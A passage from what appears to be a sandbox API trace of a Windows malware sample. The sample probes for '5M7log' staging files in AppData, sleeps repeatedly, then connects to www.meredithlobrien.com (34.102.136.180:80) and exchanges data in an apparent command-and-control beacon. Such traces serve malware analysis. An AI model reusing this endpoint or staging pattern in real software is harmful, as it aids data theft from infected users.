DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.935] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.935] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.935] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.935] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.935] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.935] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.935] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.935] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.935] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.935] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.935] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.935] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.936] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.936] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.936] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.936] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.936] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.936] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0201.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.936] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.936] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.936] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.936] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.937] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0201.937] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.937] Sleep (dwMilliseconds=0x7d0) [0201.938] Sleep (dwMilliseconds=0x7d0) [0201.942] Sleep (dwMilliseconds=0x7d0) [0201.944] Sleep (dwMilliseconds=0x7d0) [0201.946] Sleep (dwMilliseconds=0x7d0) [0201.947] Sleep (dwMilliseconds=0x7d0) [0201.949] Sleep (dwMilliseconds=0x7d0) [0201.950] Sleep (dwMilliseconds=0x7d0) [0201.953] Sleep (dwMilliseconds=0x7d0) [0201.957] Sleep (dwMilliseconds=0x7d0) [0201.958] Sleep (dwMilliseconds=0x7d0) [0201.960] Sleep (dwMilliseconds=0x7d0) [0201.961] Sleep (dwMilliseconds=0x7d0) [0201.963] Sleep (dwMilliseconds=0x7d0) [0201.965] Sleep (dwMilliseconds=0x7d0) [0201.966] Sleep (dwMilliseconds=0x7d0) [0201.968] Sleep (dwMilliseconds=0x7d0) [0201.969] Sleep (dwMilliseconds=0x7d0) [0201.971] Sleep (dwMilliseconds=0x7d0) [0201.972] Sleep (dwMilliseconds=0x7d0) [0201.974] Sleep (dwMilliseconds=0x7d0) [0201.976] Sleep (dwMilliseconds=0x7d0) [0201.980] Sleep (dwMilliseconds=0x7d0) [0201.982] Sleep (dwMilliseconds=0x7d0) [0201.983] Sleep (dwMilliseconds=0x7d0) [0201.988] Sleep (dwMilliseconds=0x7d0) [0201.992] Sleep (dwMilliseconds=0x7d0) [0201.994] Sleep (dwMilliseconds=0x7d0) [0201.997] Sleep (dwMilliseconds=0x7d0) [0201.999] Sleep (dwMilliseconds=0x7d0) [0202.000] Sleep (dwMilliseconds=0x7d0) [0202.002] Sleep (dwMilliseconds=0x7d0) [0202.003] Sleep (dwMilliseconds=0x7d0) [0202.005] Sleep (dwMilliseconds=0x7d0) [0202.006] Sleep (dwMilliseconds=0x7d0) [0202.008] Sleep (dwMilliseconds=0x7d0) [0202.009] Sleep (dwMilliseconds=0x7d0) [0202.011] Sleep (dwMilliseconds=0x7d0) [0202.013] Sleep (dwMilliseconds=0x7d0) [0202.014] Sleep (dwMilliseconds=0x7d0) [0202.022] Sleep (dwMilliseconds=0x7d0) [0202.027] Sleep (dwMilliseconds=0x7d0) [0202.030] Sleep (dwMilliseconds=0x7d0) [0202.035] Sleep (dwMilliseconds=0x7d0) [0202.037] Sleep (dwMilliseconds=0x7d0) [0202.038] Sleep (dwMilliseconds=0x7d0) [0202.040] Sleep (dwMilliseconds=0x7d0) [0202.042] Sleep (dwMilliseconds=0x7d0) [0202.045] Sleep (dwMilliseconds=0x7d0) [0202.046] Sleep (dwMilliseconds=0x7d0) [0202.049] Sleep (dwMilliseconds=0x7d0) [0202.053] Sleep (dwMilliseconds=0x7d0) [0202.058] Sleep (dwMilliseconds=0x7d0) [0202.060] Sleep (dwMilliseconds=0x7d0) [0202.097] Sleep (dwMilliseconds=0x7d0) [0202.098] Sleep (dwMilliseconds=0x7d0) [0202.100] Sleep (dwMilliseconds=0x7d0) [0202.103] Sleep (dwMilliseconds=0x7d0) [0202.104] Sleep (dwMilliseconds=0x7d0) [0202.106] Sleep (dwMilliseconds=0x7d0) [0202.107] Sleep (dwMilliseconds=0x7d0) [0202.109] Sleep (dwMilliseconds=0x7d0) [0202.110] Sleep (dwMilliseconds=0x7d0) [0202.112] Sleep (dwMilliseconds=0x7d0) [0202.113] Sleep (dwMilliseconds=0x7d0) [0202.115] Sleep (dwMilliseconds=0x7d0) [0202.116] Sleep (dwMilliseconds=0x7d0) [0202.118] Sleep (dwMilliseconds=0x7d0) [0202.119] Sleep (dwMilliseconds=0x7d0) [0202.121] Sleep (dwMilliseconds=0x7d0) [0202.122] Sleep (dwMilliseconds=0x7d0) [0202.124] Sleep (dwMilliseconds=0x7d0) [0202.125] Sleep (dwMilliseconds=0x7d0) [0202.127] Sleep (dwMilliseconds=0x7d0) [0202.128] Sleep (dwMilliseconds=0x7d0) [0202.130] Sleep (dwMilliseconds=0x7d0) [0202.131] Sleep (dwMilliseconds=0x7d0) [0202.133] Sleep (dwMilliseconds=0x7d0) [0202.134] Sleep (dwMilliseconds=0x7d0) [0202.136] Sleep (dwMilliseconds=0x7d0) [0202.138] Sleep (dwMilliseconds=0x7d0) [0202.139] Sleep (dwMilliseconds=0x7d0) [0202.141] Sleep (dwMilliseconds=0x7d0) [0202.142] Sleep (dwMilliseconds=0x7d0) [0202.144] Sleep (dwMilliseconds=0x7d0) [0202.145] Sleep (dwMilliseconds=0x7d0) [0202.147] Sleep (dwMilliseconds=0x7d0) [0202.148] Sleep (dwMilliseconds=0x7d0) [0202.150] Sleep (dwMilliseconds=0x7d0) [0202.151] Sleep (dwMilliseconds=0x7d0) [0202.153] Sleep (dwMilliseconds=0x7d0) [0202.154] Sleep (dwMilliseconds=0x7d0) [0202.157] Sleep (dwMilliseconds=0x7d0) [0202.158] Sleep (dwMilliseconds=0x7d0) [0202.160] Sleep (dwMilliseconds=0x7d0) [0202.161] Sleep (dwMilliseconds=0x7d0) [0202.163] Sleep (dwMilliseconds=0x7d0) [0202.164] Sleep (dwMilliseconds=0x7d0) [0202.166] Sleep (dwMilliseconds=0x7d0) [0202.167] Sleep (dwMilliseconds=0x7d0) [0202.169] Sleep (dwMilliseconds=0x7d0) [0202.170] Sleep (dwMilliseconds=0x7d0) [0202.172] Sleep (dwMilliseconds=0x7d0) [0202.173] Sleep (dwMilliseconds=0x7d0) [0202.175] Sleep (dwMilliseconds=0x7d0) [0202.176] Sleep (dwMilliseconds=0x7d0) [0202.178] Sleep (dwMilliseconds=0x7d0) [0202.179] Sleep (dwMilliseconds=0x7d0) [0202.181] Sleep (dwMilliseconds=0x7d0) [0202.182] Sleep (dwMilliseconds=0x7d0) [0202.184] Sleep (dwMilliseconds=0x7d0) [0202.186] Sleep (dwMilliseconds=0x7d0) [0202.187] Sleep (dwMilliseconds=0x7d0) [0202.189] Sleep (dwMilliseconds=0x7d0) [0202.190] Sleep (dwMilliseconds=0x7d0) [0202.192] Sleep (dwMilliseconds=0x7d0) [0202.193] Sleep (dwMilliseconds=0x7d0) [0202.195] Sleep (dwMilliseconds=0x7d0) [0202.196] Sleep (dwMilliseconds=0x7d0) [0202.198] Sleep (dwMilliseconds=0x7d0) [0202.199] Sleep (dwMilliseconds=0x7d0) [0202.201] Sleep (dwMilliseconds=0x7d0) [0202.202] Sleep (dwMilliseconds=0x7d0) [0202.204] Sleep (dwMilliseconds=0x7d0) [0202.205] Sleep (dwMilliseconds=0x7d0) [0202.207] Sleep (dwMilliseconds=0x7d0) [0202.208] Sleep (dwMilliseconds=0x7d0) [0202.210] Sleep (dwMilliseconds=0x7d0) [0202.212] Sleep (dwMilliseconds=0x7d0) [0202.214] Sleep (dwMilliseconds=0x7d0) [0202.215] Sleep (dwMilliseconds=0x7d0) [0202.217] Sleep (dwMilliseconds=0x7d0) [0202.218] Sleep (dwMilliseconds=0x7d0) [0202.220] Sleep (dwMilliseconds=0x7d0) [0202.221] Sleep (dwMilliseconds=0x7d0) [0202.223] Sleep (dwMilliseconds=0x7d0) [0202.224] Sleep (dwMilliseconds=0x7d0) [0202.226] Sleep (dwMilliseconds=0x7d0) [0202.227] Sleep (dwMilliseconds=0x7d0) [0202.230] Sleep (dwMilliseconds=0x7d0) [0202.231] Sleep (dwMilliseconds=0x7d0) [0202.233] Sleep (dwMilliseconds=0x7d0) [0202.234] Sleep (dwMilliseconds=0x7d0) [0202.236] Sleep (dwMilliseconds=0x7d0) [0202.238] Sleep (dwMilliseconds=0x7d0) [0202.239] Sleep (dwMilliseconds=0x7d0) [0202.242] Sleep (dwMilliseconds=0x7d0) [0202.244] Sleep (dwMilliseconds=0x7d0) [0202.267] Sleep (dwMilliseconds=0x7d0) [0202.269] Sleep (dwMilliseconds=0x7d0) [0202.271] Sleep (dwMilliseconds=0x7d0) [0202.272] Sleep (dwMilliseconds=0x7d0) [0202.274] Sleep (dwMilliseconds=0x7d0) [0202.275] Sleep (dwMilliseconds=0x7d0) [0202.277] Sleep (dwMilliseconds=0x7d0) [0202.278] Sleep (dwMilliseconds=0x7d0) [0202.280] Sleep (dwMilliseconds=0x7d0) [0202.281] Sleep (dwMilliseconds=0x7d0) [0202.284] Sleep (dwMilliseconds=0x7d0) [0202.295] Sleep (dwMilliseconds=0x7d0) [0202.297] Sleep (dwMilliseconds=0x7d0) [0202.298] Sleep (dwMilliseconds=0x7d0) [0202.301] Sleep (dwMilliseconds=0x7d0) [0202.302] Sleep (dwMilliseconds=0x7d0) [0202.303] Sleep (dwMilliseconds=0x7d0) [0202.305] Sleep (dwMilliseconds=0x7d0) [0202.306] Sleep (dwMilliseconds=0x7d0) [0202.308] Sleep (dwMilliseconds=0x7d0) [0202.309] Sleep (dwMilliseconds=0x7d0) [0202.311] Sleep (dwMilliseconds=0x7d0) [0202.312] Sleep (dwMilliseconds=0x7d0) [0202.314] Sleep (dwMilliseconds=0x7d0) [0202.315] Sleep (dwMilliseconds=0x7d0) [0202.317] Sleep (dwMilliseconds=0x7d0) [0202.318] Sleep (dwMilliseconds=0x7d0) [0202.320] Sleep (dwMilliseconds=0x7d0) [0202.321] Sleep (dwMilliseconds=0x7d0) [0202.323] Sleep (dwMilliseconds=0x7d0) [0202.325] Sleep (dwMilliseconds=0x7d0) [0202.327] Sleep (dwMilliseconds=0x7d0) [0202.328] Sleep (dwMilliseconds=0x7d0) [0202.329] Sleep (dwMilliseconds=0x7d0) [0202.331] Sleep (dwMilliseconds=0x7d0) [0202.332] Sleep (dwMilliseconds=0x7d0) [0202.335] Sleep (dwMilliseconds=0x7d0) [0202.336] Sleep (dwMilliseconds=0x7d0) [0202.338] Sleep (dwMilliseconds=0x7d0) [0202.339] Sleep (dwMilliseconds=0x7d0) [0202.341] Sleep (dwMilliseconds=0x7d0) [0202.342] Sleep (dwMilliseconds=0x7d0) [0202.344] Sleep (dwMilliseconds=0x7d0) [0202.345] Sleep (dwMilliseconds=0x7d0) [0202.347] Sleep (dwMilliseconds=0x7d0) [0202.348] Sleep (dwMilliseconds=0x7d0) [0202.350] Sleep (dwMilliseconds=0x7d0) [0202.351] Sleep (dwMilliseconds=0x7d0) [0202.354] Sleep (dwMilliseconds=0x7d0) [0202.356] Sleep (dwMilliseconds=0x7d0) [0202.359] Sleep (dwMilliseconds=0x7d0) [0202.360] Sleep (dwMilliseconds=0x7d0) [0202.361] Sleep (dwMilliseconds=0x7d0) [0202.363] Sleep (dwMilliseconds=0x7d0) [0202.364] Sleep (dwMilliseconds=0x7d0) [0202.366] Sleep (dwMilliseconds=0x7d0) [0202.367] Sleep (dwMilliseconds=0x7d0) [0202.409] Sleep (dwMilliseconds=0x7d0) [0202.411] Sleep (dwMilliseconds=0x7d0) [0202.413] Sleep (dwMilliseconds=0x7d0) [0202.414] Sleep (dwMilliseconds=0x7d0) [0202.415] Sleep (dwMilliseconds=0x7d0) [0202.418] Sleep (dwMilliseconds=0x7d0) [0202.419] Sleep (dwMilliseconds=0x7d0) [0202.420] Sleep (dwMilliseconds=0x7d0) [0202.422] Sleep (dwMilliseconds=0x7d0) [0202.423] Sleep (dwMilliseconds=0x7d0) [0202.425] Sleep (dwMilliseconds=0x7d0) [0202.426] Sleep (dwMilliseconds=0x7d0) [0202.428] Sleep (dwMilliseconds=0x7d0) [0202.432] Sleep (dwMilliseconds=0x7d0) [0202.434] Sleep (dwMilliseconds=0x7d0) [0202.435] Sleep (dwMilliseconds=0x7d0) [0202.436] Sleep (dwMilliseconds=0x7d0) [0202.438] Sleep (dwMilliseconds=0x7d0) [0202.441] Sleep (dwMilliseconds=0x7d0) [0202.443] Sleep (dwMilliseconds=0x7d0) [0202.445] Sleep (dwMilliseconds=0x7d0) [0202.447] Sleep (dwMilliseconds=0x7d0) [0202.448] Sleep (dwMilliseconds=0x7d0) [0202.450] Sleep (dwMilliseconds=0x7d0) [0202.451] Sleep (dwMilliseconds=0x7d0) [0202.453] Sleep (dwMilliseconds=0x7d0) [0202.454] Sleep (dwMilliseconds=0x7d0) [0202.456] Sleep (dwMilliseconds=0x7d0) [0202.459] Sleep (dwMilliseconds=0x7d0) [0202.468] Sleep (dwMilliseconds=0x7d0) [0202.470] Sleep (dwMilliseconds=0x7d0) [0202.471] Sleep (dwMilliseconds=0x7d0) [0202.477] Sleep (dwMilliseconds=0x7d0) [0202.479] Sleep (dwMilliseconds=0x7d0) [0202.481] Sleep (dwMilliseconds=0x7d0) [0202.482] Sleep (dwMilliseconds=0x7d0) [0202.490] Sleep (dwMilliseconds=0x7d0) [0202.492] Sleep (dwMilliseconds=0x7d0) [0202.494] Sleep (dwMilliseconds=0x7d0) [0202.495] Sleep (dwMilliseconds=0x7d0) [0202.497] Sleep (dwMilliseconds=0x7d0) [0202.499] Sleep (dwMilliseconds=0x7d0) [0202.587] Sleep (dwMilliseconds=0x7d0) [0202.649] Sleep (dwMilliseconds=0x7d0) [0202.691] Sleep (dwMilliseconds=0x7d0) [0202.698] socket (af=2, type=1, protocol=6) returned 0x1c60 [0202.699] getaddrinfo (in: pNodeName="www.meredithlobrien.com", pServiceName="80", pHints=0x9e77698*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e776c8 | out: ppResult=0x9e776c8*=0xa05e310*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92b30*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0202.754] connect (s=0x1c60, name=0x9f92b30*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0202.821] send (s=0x1c60, buf=0x82e10fa*, len=173, flags=0) returned 173 [0202.822] setsockopt (s=0x1c60, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0202.822] recv (in: s=0x1c60, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 477 [0202.967] closesocket (s=0x1c60) returned 0 [0202.967] Sleep (dwMilliseconds=0x7d0) [0202.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.971] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0202.972] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0202.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.972] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0202.972] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a460) returned 1 [0202.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.972] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0202.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0202.972] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f899b0) returned 1 [0202.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.972] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, 